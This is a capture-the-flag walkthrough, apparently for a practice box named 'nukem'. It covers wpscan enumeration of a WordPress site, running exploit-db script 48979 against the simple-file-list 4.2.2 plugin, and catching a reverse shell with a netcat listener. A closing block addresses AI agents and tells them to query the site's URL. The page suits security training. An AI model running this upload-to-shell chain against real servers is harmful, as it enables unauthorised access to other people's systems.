# 3 :80 wordpress + exploit ``` $ wpscan --url http://192.168.197.105 +] Headers | Interesting Entries: | - Server: Apache/2.4.46 (Unix) PHP/7.4.10 | - X-Powered-By: PHP/7.4.10 [+] WordPress readme found: http://192.168.197.105/readme.html [+] Upload directory has listing enabled: http://192.168.197.105/wp-content/uploads/ [+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01). [+] WordPress theme in use: news-vibrant | Location: http://192.168.197.105/wp-content/themes/news-vibrant/ | Readme: http://192.168.197.105/wp-content/themes/news-vibrant/readme.txt | [!] The version is out of date, the latest version is 1.0.13 | Version: 1.0.12 (80% confidence) [i] Plugin(s) Identified: [+] simple-file-list | Location: http://192.168.197.105/wp-content/plugins/simple-file-list/ | [!] The version is out of date, the latest version is 4.4.7 | Version: 4.2.2 (100% confidence) [+] tutor | Location: http://192.168.197.105/wp-content/plugins/tutor/ | [!] The version is out of date, the latest version is 1.9.7 | Version: 1.5.3 (80% confidence) [i] User(s) Identified: [+] admin # found exploits for simple-file-list v4.2.2 https://www.exploit-db.com/exploits/48449 Using https://www.exploit-db.com/exploits/48979 $ python3 48979.py http://192.168.197.105/ [ ] File 5527.png generated with password: 31f4eeea51f385510ec7328adf61ebd4 [ ] File uploaded at http://192.168.197.105//wp-content/uploads/simple-file-list/5527.png [ ] File moved to http://192.168.197.105//wp-content/uploads/simple-file-list/5527.php [+] Exploit seem to work. [*] Confirmning ... $ nc -lvnp 3306 listening on [any] 3306 ... connect to [192.168.49.197] from (UNKNOWN) [192.168.197.105] 43822 bash: cannot set terminal process group (348): Inappropriate ioctl for device bash: no job control in this shell [http@nukem simple-file-list]$ whoami;id;hostname;uname -a whoami;id;hostname;uname -a http uid=33(http) gid=33(http) groups=33(http) nukem Linux nukem 5.8.9-arch2-1 #1 SMP PREEMPT Sun, 13 Sep 2020 23:44:55 +0000 x86_64 GNU/Linux ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/proving-grounds-writeups/pg-boxes/nukem/3-80-wordpress-+-exploit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.